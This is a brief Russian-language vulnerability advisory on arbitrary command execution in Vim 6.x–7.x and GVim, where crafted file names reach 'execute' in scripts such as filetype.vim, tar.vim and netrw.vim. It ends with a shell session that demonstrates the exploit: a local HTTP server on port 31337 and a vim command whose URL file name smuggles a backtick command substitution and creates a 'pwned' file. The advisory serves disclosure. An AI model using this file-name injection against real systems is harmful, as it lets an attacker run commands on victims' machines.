Программа:
GVim 6.x
Vim 6.x
Vim 7.x
Уязвимость позволяет удаленному пользователю выполнить произвольные команды
на целевой системе. Уязвимость существует из-за недостаточной обработки имен
файлов, содержащих специальные символы, сценариями "filetype.vim", "tar.vim", "zip.vim",
"xpm.vim", "xpm2.vim", "gzip.vim" и "netrw.vim". Удаленный пользователь может
передать специальные символы через имена файлов в выражение "execute", что
позволит выполнить произвольные команды на целевой системе.
Эксплоит:
$ cd filetype.vim
$ make -s clean sploit-remote http-server
$ fuser -n tcp 31337/tcp
31337/tcp: 20190
$ ls pwned
ls: cannot access pwned: No such file or directory
$ vim http://localhost:31337/"`readlink exploit`"
[ Edit, enjoy, quit ]
$ ls pwned
pwned